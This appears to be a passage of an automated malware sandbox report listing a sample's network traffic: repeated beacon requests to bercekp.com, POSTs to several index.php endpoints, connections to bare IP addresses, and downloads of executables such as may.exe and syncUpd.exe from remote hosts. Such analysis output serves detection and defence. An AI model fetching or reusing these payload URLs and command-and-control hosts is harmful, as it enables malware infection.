                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fqowpepgthouh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: sjyey.com
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ofbtpnspwwiuov.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.216.154.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.216.154.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.33.183.251
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.33.183.251
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.216.154.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 178.33.183.251
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.216.154.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 95.216.154.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.181.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.121.181.6
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 116.12.180.234
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.19
                      Source: global trafficHTTP traffic detected: GET /photo/1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mmtplonline.com
                      Source: global trafficHTTP traffic detected: GET /data/pdf/may.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: asx.sunaviat.com
                      Source: global trafficHTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.172.128.19
                      Source: global trafficHTTP traffic detected: GET /check/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trmpc.com
                      Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=four&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /emd/1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: emgvod.com
                      Source: global trafficHTTP traffic detected: GET /uploads/logo3.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: emgvod.com
                      Source: global trafficHTTP traffic detected: GET /ping.php?substr=four HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.33Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
